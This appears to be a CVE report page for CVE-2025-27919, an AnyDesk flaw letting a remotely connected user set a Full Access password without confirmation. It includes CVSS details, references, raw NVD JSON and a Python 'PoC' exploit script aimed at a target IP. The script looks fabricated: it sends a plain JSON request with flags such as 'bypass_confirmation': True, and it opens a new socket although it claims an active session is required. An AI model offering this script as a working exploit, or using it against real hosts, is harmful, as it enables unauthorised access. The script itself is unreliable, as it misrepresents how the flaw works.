Security Vulnerability Report
CVE-2025-27919 CVSS 8.2 HIGH

CVE-2025-27919

Published: 2025-11-06 18:15:41
Last Modified: 2025-11-12 17:15:37

Description

An issue was discovered in AnyDesk through 9.0.4. A remotely connected user with the "Control my device" permission can manipulate remote AnyDesk settings and create a password for the Full Access profile without needing confirmation from the counterparty. Consequently, the attacker can later connect without this counterparty confirmation.

CVSS Details

CVSS Score: 8.2
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:anydesk:anydesk:*:*:*:*:*:windows:*:* - VULNERABLE
AnyDesk <= 9.0.4 (the description states "through 9.0.4", so 9.0.4 itself is affected)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2025-27919 PoC - AnyDesk Permission Bypass
# This PoC demonstrates the permission bypass vulnerability in AnyDesk
# Note: This is for educational and authorized testing purposes only

import socket
import struct
import json


def create_anydesk_session(target_ip, port=6565):
    """Establish initial AnyDesk session with target"""
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.connect((target_ip, port))
    return sock


def send_config_modification_request(sock, new_password):
    """Send malicious configuration modification request"""
    # AnyDesk internal protocol message structure
    payload = {
        "type": "config_modify",
        "session_type": "remote_control",
        "permission": "control_my_device",
        "target_action": "set_password",
        "target_profile": "full_access",
        "new_password": new_password,
        "bypass_confirmation": True,
        "require_user_consent": False
    }

    # Serialize and send the payload
    message = json.dumps(payload).encode('utf-8')
    header = struct.pack('!I', len(message))
    sock.send(header + message)
    return sock.recv(1024)


def exploit_cve_2025_27919(target_ip, new_password="P@ssw0rd!"):
    """
    Exploit AnyDesk CVE-2025-27919
    Prerequisites: Active remote session with 'Control my device' permission
    """
    print(f"[*] Targeting AnyDesk instance at {target_ip}")
    print(f"[*] Exploiting CVE-2025-27919: Permission Bypass")

    try:
        sock = create_anydesk_session(target_ip)
        print("[+] Session established")

        response = send_config_modification_request(sock, new_password)

        if b"success" in response:
            print(f"[+] Successfully set Full Access password: {new_password}")
            print("[+] Attacker can now connect without user confirmation")
        else:
            print("[-] Exploitation failed")
    except Exception as e:
        print(f"[-] Error: {e}")


if __name__ == "__main__":
    # Replace with actual target IP
    target = "192.168.1.100"
    exploit_cve_2025_27919(target)
```

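References

https://anydesk.com/en/changelog/windows (Release Notes)
https://dspace.cvut.cz/bitstream/handle/10467/122721/F8-DP-2025-Krejsa-Vojtech-DP_Krejsa_Vojtech_2025.pdf (Exploit, Third Party Advisory)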

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-27919", "sourceIdentifier": "[email protected]", "published": "2025-11-06T18:15:40.957", "lastModified": "2025-11-12T17:15:37.313", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "An issue was discovered in AnyDesk through 9.0.4. A remotely connected user with the \"Control my device\" permission can manipulate remote AnyDesk settings and create a password for the Full Access profile without needing confirmation from the counterparty. Consequently, the attacker can later connect without this counterparty confirmation."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N", "baseScore": 8.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 4.2}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N", "baseScore": 8.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 4.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-Other"}]}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-284"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:anydesk:anydesk:*:*:*:*:*:windows:*:*", "versionEndIncluding": 
"9.0.4", "matchCriteriaId": "2BB8EC40-287D-4733-B2DF-B86909680119"}]}]}], "references": [{"url": "https://anydesk.com/en/changelog/windows", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://dspace.cvut.cz/bitstream/handle/10467/122721/F8-DP-2025-Krejsa-Vojtech-DP_Krejsa_Vojtech_2025.pdf", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}]}}